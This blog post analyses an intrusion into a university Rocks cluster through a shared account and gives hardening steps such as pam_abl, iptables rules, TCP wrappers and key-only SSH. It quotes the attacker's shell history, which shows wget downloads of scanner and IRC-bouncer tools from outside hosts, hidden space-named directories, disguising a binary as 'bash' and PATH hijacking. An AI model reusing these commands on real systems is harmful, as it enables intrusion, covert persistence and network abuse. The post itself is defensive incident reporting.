Hardening security on your Rocks system(s)

We now understand the attack vector. Turned out to be simple, and some of the things we have done have now closed that door. It was a pretty simple door, but still worth noting. BTW: some don’t like early disclosures of exploits. I have heard from ~6 people (off the Rocks list) since posting that they have seen similar attacks attempted.

The entry point was via a shared user account. Once this account was compromised, our new friend from Romania started working. We found this (cluster name changed to protect the compromised):

[root@xxxxx user]# ls -alFt | head -10
total 2980
drwxr-xr-x   6 root root       0 Oct 23 14:40 ../
drwx------   7 user user    4096 Oct 23 12:05 ./
drwxr-xr-x   2 user user    4096 Oct 23 12:05 bodo-scan/
drwxr-xr-x   2 user user    4096 Oct 23 12:05 chyna/
-rw-------   1 user user    7894 Oct 23 00:18 .bash_history 

and in these directories, we found

[root@xxxxx user]# ls bodo-scan/ chyna
112.pscan.22  a   a3    common       go.sh    pass_file    pico    ss
93.pscan.22   a2  auto  gen-pass.sh  mfu.txt  pass_filees  pscan2  start

152,.2.pscan.22  72.20.pscan.22  core      pass1          pscan2  vuln.txt
152.2.pscan.22   79.36.pscan.22  go.sh     pass1.save     screen
189.81.pscan.22  a               help.txt  pass_file      ss
61.168.pscan.22  checkroot       mass      pass_file.bak  usage

Hmmm. Reports from the network monitoring team seemed to indicate that this unit was scanning at a massive rate. It knocked portions (as we were told) of this university off the net for a few hours last night.

Ok, we see suspicious files in an account that shouldn’t be, but was shared. Any thing more concrete?


These folks left their .bash_history chock full of what they did. They were obviously trying to p0wn the machine. It didn’t start to get interesting until here:

nano vuln.txt
./unix 129.219
cd /dev/shm

ok … they have my attention. Here is where it gets exciting. Remember that little kernel vulnerability from a few months ago? The one where you could force a system call to fail in a particular way, and get root? The one where, if you have not patched your kernel in a few months you are at risk?

They did try that as far as I can tell.

Since this was a patched system, going so far as to replacing the standard ssh daemon with an updated one reflecting the latest security and bug patches, removing all extraneous packages (there are still a few too many, and we needed to pull them off), it appears they gave up on trying to crack that system, and instead tried to turn it into a scanner. This they were successful at doing.

/start 66.233
./start 66.234
./start 66.235
./start 66.236
./start 66.239
./start 66.240
./start 66.246
./start 66.247 


chmod +x *
./a 152,.2
./a 152.2
./a 79.33
./a 79.34
./a 79.35
./a 79.36
./a 82.114
./a 82.115
./a 61.168
./a 189.81
./a 67.233
./a 61.168
./a 72.20 

not to mention attempting non-secure port bots:

cd ..
mkdir "  "
cd "  "
wget wget
ps x
cd /var/tmp
ls -a
cd /tmp
ls -a
cd team2
nano vuln.txt
cd /dev/shm 

Notice the name of the directory they made. Look closely at the mkdir.

Now if this isn’t bad enough, look at this:

mkdir " "
cd " "
wget members.lycos.co.uk/sonnyremote/psy.tar
tar xzvf psy.tar
rm -rf psy.tar
cd .bash
export PATH=:.
ps -ax 

They are still trying to gain root.

And pulling down tool after tool to do so.

Finally they went for broke, pulling down tools from a number of sites:

wget http://Linux-Help.clan.su/download/psybnc-linux.tgz
wget http://nasaundernet.is-the-boss.com/psybnc-linux.tgz
tar zxvf psybnc-linux.tgz
cd psybnc-linux ; cd psybnc
mv psybnc bash
chmod +x * ; sh
PATH=:$PATH ; bash
PATH=:$PATH ; bash 

and gave up with simple udp traffic generators which I won’t replicate here.

Ok, what lessons can we learn from this, and how can we harden the systems? My initial guess of a root exploit was not fully correct. They tried it, didn’t get there, and achieved secondary goals.

Their goals appear to be, in approximate order:

1) p0wn the machine (take complete control of it)

2) if #1 isn’t possible, then try to turn it into a bot of some sort

3) if #2 isn’t possible, then try to turn it into a traffic generator and take down nets.

4) in all cases, prep for the next attack, making sure you have multiple possible attack vectors, so poison the other ~/.ssh/authorized_keys files, ~/.rhosts files, ~/.shosts files, …

I am guessing I am approximately right, and I am sure that this can be refined quite a bit.

So how do we stop this? I’ll talk in the context of Rocks cluster(s), but it applies to all (Linux) clusters.

User policy:

1) [mandate] no sharing of accounts. This is verboten. It is easy enough to socially engineer someone into running something they shouldn’t. See all those nice “export PATH=…” things? What happens if root gets into that account, with the path set to look at the local (compromised) path first, before the normal path? Or an end user?

2) [suggestion] consider turning off suid on the mount (e.g. use the “nosuid” mount option). This should not impact any users. If it does, you need to speak with them about why they need suid access, and see if another method will work. This is, curiously related to the original attack vector assumption based upon a previous compromise of this system.


1) [strongly urged] use pam_abl. This provides support in the pam layer for banning users based upon failed logins. This is similar to fail2ban, with the advantage that since it works at the pam layer, it can be used for ftp as well as ssh and other login services using pam.

You have to create an /etc/security/pam_abl.conf file, and add an entry into your /etc/pam.d/ service where you want to use it. For example

# /etc/security/pam_abl.conf

and our /etc/pam.d/sshd file should include this line after the pam_env line:

auth required /lib/security/pam_abl.so config=/etc/security/pam_abl.conf

2) [strongly urged] for any nodes with public IP addresses, limit the range of destination ports using IP tables. Someone wants to ssh or wget or ftp a file, sure. Disable most other public access. I am not a fan of IPtables on compute nodes, but when we do mission these as login nodes, and purposefully remove as much as possible, this configuration is definitely advised.

Here is a good /etc/sysconfig/iptables file looks like for these nodes


# Preamble
-A FORWARD -i eth1 -o eth0 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -j ACCEPT
-A INPUT -i eth0 -j ACCEPT
-A INPUT -i lo -j ACCEPT

# Allow these ports
-A INPUT -m state --state NEW -p tcp --dport ssh -j ACCEPT
# Uncomment the lines below to activate web access to the cluster.
-A INPUT -m state --state NEW -p tcp --dport https -j ACCEPT
-A INPUT -m state --state NEW -p tcp --dport www -j ACCEPT
-A INPUT -i eth0 -p udp --dport 53 -j ACCEPT

# Standard rules
-A INPUT -p icmp --icmp-type any -j ACCEPT
# Uncomment the line below to log incoming packets.
#-A INPUT -j LOG --log-prefix "Unknown packet:"

# Deny section
-A INPUT -p udp --dport 0:1024 -j REJECT
-A INPUT -p tcp --dport 0:1024 -j REJECT
# Block incoming ganglia packets on public interface.
-A INPUT -p udp --dport 8649 -j REJECT

# specific rejects for security
-A INPUT -p tcp --dport 3306 -i eth1 -j REJECT
-A INPUT -p tcp --dport 111 -i eth1 -j REJECT
-A INPUT -p udp --dport 111 -i eth1 -j REJECT
-A INPUT -p tcp --dport 25 -i eth1 -j REJECT
-A INPUT -p tcp --dport 199 -i eth1 -j REJECT
-A INPUT -p tcp --dport 536 -i eth1 -j REJECT
-A INPUT -p tcp --dport 852 -i eth1 -j REJECT
-A INPUT -p tcp --dport 873 -i eth1 -j REJECT
-A INPUT -p tcp --dport 910 -i eth1 -j REJECT
-A INPUT -p tcp --dport 2049 -i eth1 -j REJECT
-A INPUT -p udp --dport 2049 -i eth1 -j REJECT
-A INPUT -p tcp --dport 32774 -i eth1 -j REJECT

# For a draconian "drop-all" firewall, uncomment the line below.

Could be improved.

3) [strongly urged] for any nodes with public IP addresses, make sure you have /etc/hosts.deny and /etc/hosts.allow set up appropriately. Actively deny everything by default, and only allow what you need.

Here is a good /etc/hosts.deny

# hosts.deny This file describes the names of the hosts which are
# *not* allowed to use the local INET services, as decided
# by the ‘/usr/sbin/tcpd’ server.
# The portmap line is redundant, but it is left to remind you that
# the new secure portmap uses hosts.deny and hosts.allow. In particular
# you should know that NFS uses portmap!

portmap: ALL
http: ALL

Here is a good /etc/hosts.allow
# hosts.allow This file describes the names of the hosts which are
# allowed to use the local INET services, as decided
# by the ‘/usr/sbin/tcpd’ server.

sshd: ALL

4) [strongly recommended] set up minimal sudo access to handle specific end user occasional needs. Do not let users run as root. There is no reason to.

5) [strongly recommended] pro-active login monitoring. Is who is on your system supposed to be who is on your system? If you have 10 users spread out all over, this is hard. If you have 20, it is very hard. You should try to get users to let you know from where they are coming from, so that you can see if it really was them. Because a login gone wrong can do great damage.

6) [strongly recommended] no passwords. Keys for all, and for all, keys. Keyloggers can’t grab passwords that are never typed. It is possible (and not to hard) to coax putty to use keys. MacOSX can do this as well as it and the ssh in Linux are quite similar. Keys should be refreshed. Contents of ~/.ssh/authorized_keys should be flushed and controlled.

There are a few other things I can probably think of, but this is it for the moment for this post. We are going to implement other techniques for some of our customers which should provide them even better protection, even against errant port scanners and other annoying crackers.

Regardless of that, please do patch your systems. Especially if your kernel is more than a few months old.

Viewed 8907 times by 2281 viewers